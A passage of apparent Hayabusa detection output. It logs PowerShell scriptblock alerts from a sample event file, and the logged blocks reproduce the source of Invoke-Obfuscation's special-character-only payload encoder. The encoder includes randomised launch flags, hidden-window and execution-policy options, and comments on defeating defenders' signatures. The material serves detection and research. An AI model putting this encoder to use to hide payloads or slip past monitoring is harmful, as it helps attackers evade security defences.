# 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. 
$NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. 
If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.279 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. 
.PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ 
}${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ 
*}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? 
\""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. 
# 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. 
$NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. 
If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.279 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.280 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.280 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
